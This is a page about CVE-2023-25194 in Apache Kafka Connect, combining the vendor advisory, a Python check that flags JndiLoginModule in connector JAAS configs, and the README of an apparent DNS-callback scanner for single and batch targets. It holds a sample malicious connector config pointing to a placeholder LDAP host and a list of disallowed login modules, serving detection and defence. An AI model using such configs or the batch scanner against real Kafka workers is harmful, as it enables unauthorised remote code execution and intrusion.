
CVE-2023-25194 PoC — Apache Kafka Connect API: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration using Kafka Connect

Associated Vulnerability
Title: Apache Kafka Connect API: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration using Kafka Connect (CVE-2023-25194)

Description: A possible security vulnerability has been identified in the Apache Kafka Connect API. Exploitation requires access to a Kafka Connect worker and the ability to create or modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0.

When configuring a connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This makes the server connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to run Java deserialization gadget chains on the Kafka Connect server. An attacker can thereby cause unrestricted deserialization of untrusted data, or RCE when suitable gadgets are on the classpath.

Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations on Kafka Connect clusters running with out-of-the-box configuration. Before Apache Kafka 3.0.0, users could not specify these properties unless the Kafka Connect cluster had been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, a system property ("-Dorg.apache.kafka.disallowed.login.modules") disables the problematic login modules in SASL JAAS configuration, and "com.sun.security.auth.module.JndiLoginModule" is disabled by default in Apache Kafka Connect 3.4.0.

Kafka Connect users are advised to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for vulnerable versions, and either upgrade the connectors, upgrade the specific dependency, or remove the connectors. Finally, in addition to the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can implement their own connector client config override policy, which controls which Kafka client properties can be overridden directly in a connector config and which cannot.
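As an added example (not code from the original page, from Apache Kafka, or from the scanner's author), the following Python check implements the advisory's advice to validate connector configurations before they are submitted: it parses every `*.sasl.jaas.config` value in a connector config, reports any login module that appears on the disallowed list, and reads that list from a `-Dorg.apache.kafka.disallowed.login.modules=` JVM option the way an operator would set it. The two connector configs, the `ldap://attacker.invalid/a` URL and the JVM option string are constructed sample inputs; the function names are this example's own.

```python
"""Pre-submission check for Kafka Connect connector configs (added example).

Implements the advisory's advice to validate connector configurations before
they reach the Connect REST API: any *.sasl.jaas.config value that names a
disallowed JAAS login module (JndiLoginModule by default) is reported.
"""
import re
from typing import Dict, FrozenSet, List

# Login module that Kafka 3.4.0 disables by default through the
# -Dorg.apache.kafka.disallowed.login.modules system property (per the advisory).
DEFAULT_DISALLOWED_LOGIN_MODULES: FrozenSet[str] = frozenset({
    "com.sun.security.auth.module.JndiLoginModule",
})
DISALLOWED_PROP = "org.apache.kafka.disallowed.login.modules"

# A JAAS config value is one or more "<LoginModuleClass> <flag> [options];"
# entries. This captures the class name at the start of each entry.
_LOGIN_MODULE_RE = re.compile(
    r"(?:^|;)\s*([A-Za-z_][\w.$]*)\s+(?:required|requisite|sufficient|optional)\b",
    re.IGNORECASE,
)


def login_modules_in(jaas_config: str) -> List[str]:
    """Return the login module class names named in a JAAS config string."""
    return _LOGIN_MODULE_RE.findall(jaas_config)


def disallowed_modules_from_jvm_opts(jvm_opts: str) -> FrozenSet[str]:
    """Parse -Dorg.apache.kafka.disallowed.login.modules=a,b from a KAFKA_OPTS-style string.

    Returns the default set when the option is absent, mirroring the 3.4.0
    default described in the advisory.
    """
    for token in jvm_opts.split():
        if token.startswith(f"-D{DISALLOWED_PROP}="):
            value = token.split("=", 1)[1]
            return frozenset(m.strip() for m in value.split(",") if m.strip())
    return DEFAULT_DISALLOWED_LOGIN_MODULES


def find_disallowed_jaas_overrides(
    connector_config: Dict[str, str],
    disallowed: FrozenSet[str] = DEFAULT_DISALLOWED_LOGIN_MODULES,
) -> List[str]:
    """Report every JAAS config key in the connector config that names a disallowed module.

    Covers producer.override./consumer.override./admin.override.sasl.jaas.config
    (the keys the advisory names) and any other key ending in sasl.jaas.config.
    """
    findings: List[str] = []
    for key, value in connector_config.items():
        if not key.endswith("sasl.jaas.config"):
            continue
        for module in login_modules_in(value):
            if module in disallowed:
                findings.append(f"{key}: disallowed login module {module}")
    return findings


# Constructed samples (not taken from the page): a connector config of the kind
# the advisory describes, and a benign one using PlainLoginModule.
# user.provider.url is a documented JndiLoginModule option; the host is a placeholder.
SAMPLE_MALICIOUS_CONFIG = {
    "name": "example-sink",
    "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
    "topics": "example",
    "producer.override.sasl.jaas.config": (
        'com.sun.security.auth.module.JndiLoginModule required '
        'user.provider.url="ldap://attacker.invalid/a";'
    ),
}
SAMPLE_BENIGN_CONFIG = {
    "name": "example-sink",
    "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
    "topics": "example",
    "producer.override.sasl.jaas.config": (
        'org.apache.kafka.common.security.plain.PlainLoginModule required '
        'username="svc" password="secret";'
    ),
}

if __name__ == "__main__":
    # Hypothetical KAFKA_OPTS for a worker that also bans a second (made-up) module.
    opts = (
        f"-Xmx1g -D{DISALLOWED_PROP}="
        "com.sun.security.auth.module.JndiLoginModule,com.example.OtherLoginModule"
    )
    banned = disallowed_modules_from_jvm_opts(opts)
    for label, cfg in (("malicious", SAMPLE_MALICIOUS_CONFIG), ("benign", SAMPLE_BENIGN_CONFIG)):
        print(label, "->", find_disallowed_jaas_overrides(cfg, banned) or "OK")
```

Running the script as-is reports the JndiLoginModule override in the malicious sample and "OK" for the benign one. Workers on 3.4.0 or later already reject the module when the connector config is applied; the check is useful as a CI gate or REST proxy rule in front of older workers, and as a way to keep an explicit allow-list of login modules rather than relying on the default. The worker-side knob the advisory calls the "connector client override policy" is the `connector.client.config.override.policy` worker property; setting it to `None` (the pre-3.0.0 default) rejects every `producer.override.*`, `consumer.override.*` and `admin.override.*` key outright, which removes the attack surface entirely where per-connector client overrides are not needed.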
Description
CVE-2023-25194 Scan
Readme


This tool is intended for security testing purposes only. Do not engage in any illegal activities. Any consequences resulting from misuse are solely your responsibility.

The CVE-2023-25194 detection tool triggers a JNDI lookup on the target that resolves against a DNS log platform and uses what the platform reports to decide whether the target is vulnerable. The verdict is based on the response content observed during the test. Some response contents show that the target did reach the DNS log platform but cannot be taken any further; those are ignored as not exploitable. Note that a DNS callback only confirms that the worker evaluated the supplied JNDI login module configuration: as the advisory above states, code execution additionally requires a usable deserialization gadget chain on the worker's classpath.

```
python3 CVE-2023-25194_Scan.py -h

_______    ________    ___   ____ ___  _____      ___   _____________  __ __
  / ____/ |  / / ____/   |__ \ / __ \__ \|__  /     |__ \ / ____<  / __ \/ // /
 / /    | | / / __/________/ // / / /_/ / /_ <________/ //___ \ / / /_/ / // /_
/ /___  | |/ / /__/_____/ __// /_/ / __/___/ /_____/ __/____/ // /\__, /__  __/
\____/  |___/_____/    /____/\____/____/____/     /____/_____//_//____/  /_/

                                                    PowerBy:YongYe__Security

usage: CVE-2023-25194_Scan.py [-h] (-u URL | -f FILE)

Send POST requests to URLs

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL, Single target detection
  -f FILE, --file FILE  URL File, Batch scan

```

Single-target detection

```
python3 CVE-2023-25194_Scan.py -u http://127.0.0.1:8080
```
![image](https://github.com/YongYe-Security/CVE-2023-25194/blob/main/1.png)

Batch target scanning

URLs found to be vulnerable are written to the file "result.txt" in the current directory.

```
python3 CVE-2023-25194_Scan.py -f url.txt
```
![image](https://github.com/YongYe-Security/CVE-2023-25194/blob/main/3.png)

If needed, change the DNS log platform address on line 34 of the script; leaving it unchanged does not affect the program's execution.


File Snapshot

[4.0K] /data/pocs/98579a8b300fe13d0201d0d2a720c0d15ed46187
├── [ 10K] 1.png
├── [ 12K] 2.png
├── [589K] 3.png
├── [4.0K] CVE-2023-25194_Scan.py
├── [1.9K] README.md
└── [1.5K] Readme-zh-cn.md

0 directories, 6 files